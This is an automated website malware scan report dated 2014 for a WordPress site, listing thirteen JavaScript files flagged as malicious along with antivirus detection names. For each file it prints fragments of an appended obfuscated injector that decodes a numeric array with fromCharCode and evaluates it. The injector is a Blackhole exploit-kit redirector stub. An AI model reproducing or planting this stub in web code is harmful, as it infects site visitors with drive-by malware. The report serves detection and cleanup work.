Malware Scanner report for usharif3.com

Malicious/Suspicious/Total urls checked: 13/0/16

13 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.usharif3.com/	HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 05 Oct 2014 05:11:28 GMT Location: http://usharif3.com/main/ Server: Apache Content-Length: 0 Content-Type: text/html	clean
http://usharif3.com/main/	200 OK Content-Length: 24427 Content-Type: text/html	clean
https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js?ver=3.4	200 OK Content-Length: 85925 Content-Type: text/javascript	clean
http://usharif3.com/main/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3	200 OK Content-Length: 13233 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) shutterOnload = function(){shutterReloaded.init('sh');} if (typeof shutterOnload == 'function') { if ('undefined' != typeof jQuery) jQuery(document).ready(function(){shutterOnload();}); else if( typeof window.onload != 'function' ) window.onload = shutterOnload; else {oldonld = window.onload;window.onload = function(){if(oldonld){oldonld();};shutterOnload();}}; } shutterReloaded = { I : function (a) { return document.get ... 3271 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Decode-BCN [Trj] Ad-Aware Trojan.JS.Agent.IJB nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall TROJ_GEN.F47V1202 Comodo TrojWare.JS.Agent.IR Emsisoft Trojan.JS.Agent.IJB (B) CAT-QuickHeal JS\BlacoleRef.DD K7GW Exploit ( 04c553011 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Microsoft Exploit:JS/Blacole.LR MicroWorld-eScan Trojan.JS.Agent.IJB Fortinet JS/Iframe.WOR!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.JS.Agent.IJB F-Prot JS/IFrame.RS AVG HTML/Framer Norman Exploit.AIV GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995	200 OK Content-Length: 29560 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(a){function r(b){function e(b){for(;b&&b.nodeName.toLowerCase()!="html";b=b.parentNode){var c=a.css(b,"background-color");if(c&&c.indexOf("rgb")>=0){var e=c.match(/\d+/g);return"#"+d(e[0])+d(e[1])+d(e[2])}if(c&&c!="transparent")return c}return"#ffffff"}function d(a){a=parseInt(a,10).toString(16);return a.length<2?"0"+a:a}c("applying clearType background-color hack");b.each(function(){a(this).css("background-color",e(this))})}function q(b,c){var d=a(c.pager ... 3159 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Decode-BCN [Trj] Ad-Aware Trojan.JS.Agent.IJB Bkav MW.Clod2b0.Trojan.9110 Ikarus Virus.HTML.Framer nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall TROJ_GEN.F47V1202 Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR CAT-QuickHeal JS\BlacoleRef.DD K7GW Exploit ( 04c553011 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Microsoft Exploit:JS/Blacole.LR Kaspersky Trojan.JS.Redirector.xb ViRobot JS.A.Redirector.29488.A MicroWorld-eScan Trojan.JS.Agent.IJB Fortinet JS/Iframe.WOR!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.JS.Agent.IJB F-Prot JS/IFrame.RS AVG HTML/Framer Norman Exploit.AIV GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06	200 OK Content-Length: 4761 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) jQuery.fn.nggSlideshow=function(args){var defaults={id:1,width:320,height:240,fx:'fade',domain:'',timeout:5000};var s=jQuery.extend({},defaults,args);var obj=this.selector;var stack=[];var url=s.domain+'index.php?callback=json&api_key=true&format=json&method=gallery&id='+s.id;var stackLength=0;jQuery.getJSON(url,function(r){if(r.stat=="ok"){for(img in r.images){var photo=r.images[img];stack.push(decodeURI(photo['imageURL']))}stackLength=stack.length;loadImage(1)}});function loadI ... 3747 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Decode-BCN [Trj] Ad-Aware Trojan.JS.Agent.IJB Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall TROJ_GEN.F47V1202 Comodo TrojWare.JS.Agent.IR Emsisoft Trojan.JS.Agent.IJB (B) CAT-QuickHeal JS\BlacoleRef.DD K7GW Exploit ( 04c553011 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.LR MicroWorld-eScan Trojan.JS.Agent.IJB Fortinet JS/Iframe.WOR!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.JS.Agent.IJB F-Prot JS/IFrame.RS AVG HTML/Framer Norman Exploit.AIV GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/themes/blacklabel/js/swfobject.js	200 OK Content-Length: 12729 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var b="undefined",Q="object",n="Shockwave Flash",p="ShockwaveFlash.ShockwaveFlash",P="application/x-shockwave-flash",m="SWFObjectExprInst",j=window,K=document,T=navigator,o=[],N=[],i=[],d=[],J,Z=null,M=null,l=null,e=false,A=false;var h=function(){var v=typeof K.getElementById!=b&&typeof K.getElementsByTagName!=b&&typeof K.createElement!=b,AC=[0,0,0],x=null;if(typeof T.plugins!=b&&typeof T.plugins[n]==Q){x=T.plugins[n].description;if(x&&!(t ... 3104 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Iframe-ZR [Trj] nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR CAT-QuickHeal JS\BlacoleRef.DD McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.LR Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.JS.Agent.IJB F-Prot JS/IFrame.RS AVG HTML/Framer Norman Agent.AMAYB GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/themes/blacklabel/js/jquery.jplayer.min.js	200 OK Content-Length: 36262 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(c,h){c.fn.jPlayer=function(a){var b=typeof a==="string",d=Array.prototype.slice.call(arguments,1),f=this;a=!b&&d.length?c.extend.apply(null,[true,a].concat(d)):a;if(b&&a.charAt(0)==="_")return f;b?this.each(function(){var e=c.data(this,"jPlayer"),g=e&&c.isFunction(e[a])?e[a].apply(e,d):e;if(g!==e&&g!==h){f=g;return false}}):this.each(function(){var e=c.data(this,"jPlayer");if(e){e.option(a\|\|{})._init();e.option(a\|\|{})}else c.data(this,"jPlayer",new c.jPl ... 3086 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Iframe-ZR [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR CAT-QuickHeal JS\BlacoleRef.DD McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.LR Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.JS.Agent.IJB F-Prot JS/IFrame.RS AVG HTML/Framer GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.8.20	200 OK Content-Length: 7265 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(a,b){function c(b,c){var e=b.nodeName.toLowerCase();if("area"===e){var f=b.parentNode,g=f.name,h;return!b.href\|\|!g\|\|f.nodeName.toLowerCase()!=="map"?!1:(h=a("img[usemap=#"+g+"]")[0],!!h&&d(h))}return(/input\|select\|textarea\|button\|object/.test(e)?!b.disabled:"a"==e?b.href\|\|c:c)&&d(b)}function d(b){return!a(b).parents().andSelf().filter(function(){return a.curCSS(this,"visibility")==="hidden"\|\|a.expr.filters.hidden(this)}).length}a.ui=a.ui\|\|{};if(a.ui.version)return;a.ext ... 3068 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Decode-BCN [Trj] Ad-Aware Trojan.JS.Agent.IJB Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall TROJ_GEN.F47V1202 Comodo TrojWare.JS.Agent.IR Emsisoft Trojan.JS.Agent.IJB (B) CAT-QuickHeal JS\BlacoleRef.DD K7GW Exploit ( 04c553011 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Microsoft Exploit:JS/Blacole.LR MicroWorld-eScan Trojan.JS.Agent.IJB Fortinet JS/Iframe.WOR!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.JS.Agent.IJB F-Prot JS/IFrame.RS AVG HTML/Framer Norman Exploit.AIV GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/plugins/contact-form-7/includes/js/jquery.form.js?ver=3.09	200 OK Content-Length: 17208 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(e){var c={};c.fileapi=e("<input type='file'/>").get(0).files!==undefined;c.formdata=window.FormData!==undefined;e.fn.ajaxSubmit=function(g){if(!this.length){d("ajaxSubmit: skipping submit process - no element selected");return this}var f,w,i,l=this;if(typeof g=="function"){g={success:g}}f=this.attr("method");w=this.attr("action");i=(typeof w==="string")?e.trim(w):"";i=i\|\|window.location.href\|\|"";if(i){i=(i.match(/^([^#]+)/)\|\|[])[1]}g=e.extend(true,{url:i,success:e.ajaxSettings.su ... 3059 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Decode-BCN [Trj] Ad-Aware Trojan.JS.Agent.IJB nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall TROJ_GEN.F47V1202 Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR CAT-QuickHeal JS\BlacoleRef.DD K7GW Exploit ( 04c553011 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Microsoft Exploit:JS/Blacole.LR MicroWorld-eScan Trojan.JS.Agent.IJB Fortinet JS/Iframe.WOR!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Prot JS/IFrame.RS AVG HTML/Framer Norman Exploit.AIV GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.2	200 OK Content-Length: 9600 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($) { $(function() { try { if (typeof _wpcf7 == 'undefined' \|\| _wpcf7 === null) _wpcf7 = {}; _wpcf7 = $.extend({ cached: 0 }, _wpcf7); $('div.wpcf7 > form').ajaxForm({ beforeSubmit: function(formData, jqForm, options) { jqForm.wpcf7ClearResponseOutput(); jqForm.find('img.ajax-loader').css({ visibility: 'visible' }); return true; }, beforeSerialize: function(jqForm, options) { jqForm.fi ... 3201 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Decode-BCN [Trj] Ad-Aware Trojan.JS.Agent.IJB Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan ( 85a43f9d0 ) TrendMicro-HouseCall TROJ_GEN.F47V1202 Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR CAT-QuickHeal JS\BlacoleRef.DD K7GW Exploit ( 04c553011 ) McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Microsoft Exploit:JS/Blacole.LR Kaspersky Trojan.JS.Redirector.xb MicroWorld-eScan Trojan.JS.Agent.IJB Fortinet JS/Iframe.WOR!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.JS.Agent.IJB F-Prot JS/IFrame.RS AVG HTML/Framer Norman Exploit.AIV GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-includes/js/comment-reply.js?ver=3.4	200 OK Content-Length: 3756 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h\|\|!b\|\|!l\|\|!j){return}m.respondId=i;c=c\|\|false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form ... 2708 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Iframe-ZR [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan TrendMicro-HouseCall TROJ_GEN.F47V0325 Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.LR Fortinet JS/Iframe.W!tr NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.JS.Agent.IJB F-Prot JS/IFrame.RS AVG HTML/Framer Norman Agent.AMAYB GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/themes/blacklabel/js/jqueryslidemenu.js	200 OK Content-Length: 5637 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var arrowimages={down:['downarrowclass', 'down.gif', 23], right:['rightarrowclass', 'right.gif']} var jqueryslidemenu={ animateduration: {over: 200, out: 100}, buildmenu:function(menuid, arrowsvar){ jQuery(document).ready(function($){ var $mainmenu=$("#"+menuid+">ul") var $headers=$mainmenu.find("ul").parent() $headers.each(function(i){ var $curobj=$(this) var $subul=$(this).find('ul:eq(0)') this. ... 3818 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR CAT-QuickHeal JS\BlacoleRef.DD McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.LR Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Prot JS/IFrame.RS AVG HTML/Framer Norman Agent.AMAYB GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/themes/blacklabel/js/cufon-yui.js	200 OK Content-Length: 21228 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&& ... 3047 bytes are skipped ...11,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1asgq[i]-(i%5-5-4));} z=s;e(s);}/8178af9b0a2c066043b431d238c0190f*/ Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Iframe-ZR [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR CAT-QuickHeal JS\BlacoleRef.DD McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Microsoft Exploit:JS/Blacole.LR McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Secure Trojan.JS.Agent.IJB F-Prot JS/IFrame.RS AVG HTML/Framer GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/themes/blacklabel/js/fonts/PT_Sans_400-PT_Sans_700.font.js	200 OK Content-Length: 140134 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":196,"face":{"font-family":"PT Sans","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 3 2 2 3 2 2 4","ascent":"270","descent":"-90","x-height":"4","bbox":"-13 -313 352 84.6092","underline-thickness":"18","underline-position":"-18","unicode-range":"U+0020-U+2122"},"glyphs":{" ":{"w":96,"k":{"-":29,"\u00ad":29,"\u2013":29,"\u2014":29,",":5,".":5,"\u2026":5,"T":11,"V":11,"W":7,"X":11,"Y":11,"\u00dd":11,"Z":8,"v":5,"y":5,"\u00fd":5,"\u00ff":5," ... 3012 bytes are skipped ...11,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1asgq[i]-(i%5-5-4));} z=s;e(s);}/8178af9b0a2c066043b431d238c0190f*/ Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Iframe-ZR [Trj] nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR CAT-QuickHeal JS\BlacoleRef.DD McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.LR McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Prot JS/IFrame.RS AVG HTML/Framer GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB
http://usharif3.com/main/wp-content/themes/blacklabel/js/jquery.hoverIntent.minified.js	200 OK Content-Length: 4579 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ï»¿ (function($){$.fn.hoverIntent=function(f,g){var cfg={sensitivity:7,interval:100,timeout:0};cfg=$.extend(cfg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interv ... 3220 bytes are skipped ...96,110,24,61,91,111,92,32,34,53,96,111,104,39,109,96,107,60,90,110,96,31,93,113,106,41,94,93,109,62,92,107,93,33,35,38,46,33,52,7,5,0,92,104,93,112,100,93,103,110,41,90,103,104,101,100,92,53,32,110,96,106,108,92,105,106,98,97,94,43,56,30,35,107,109,35,32,35,32,53,27,92,112,105,99,109,92,107,54,33,38,92,112,105,40,111,102,63,70,78,78,107,106,98,104,98,31,33,52,7,5,116);s="";for(i=0;i-791!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCo"+"de"](1*asgq[i]-(i%5-5-4));} z=s;e(s);} Antivirus reports: AntiVir JS/BlacoleRef.W.106 Avast JS:Iframe-ZR [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Agent.IJB K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.IJB (B) Comodo TrojWare.JS.Agent.IR McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.LR Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Iframe.bgvzbb F-Prot JS/IFrame.RS AVG HTML/Framer Norman Agent.AMAYB GData Trojan.JS.Agent.IJB Commtouch JS/IFrame.RS BitDefender Trojan.JS.Agent.IJB

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: usharif3.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: usharif3.com
Referer: http://www.google.com/search?q=usharif3.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=usharif3.com

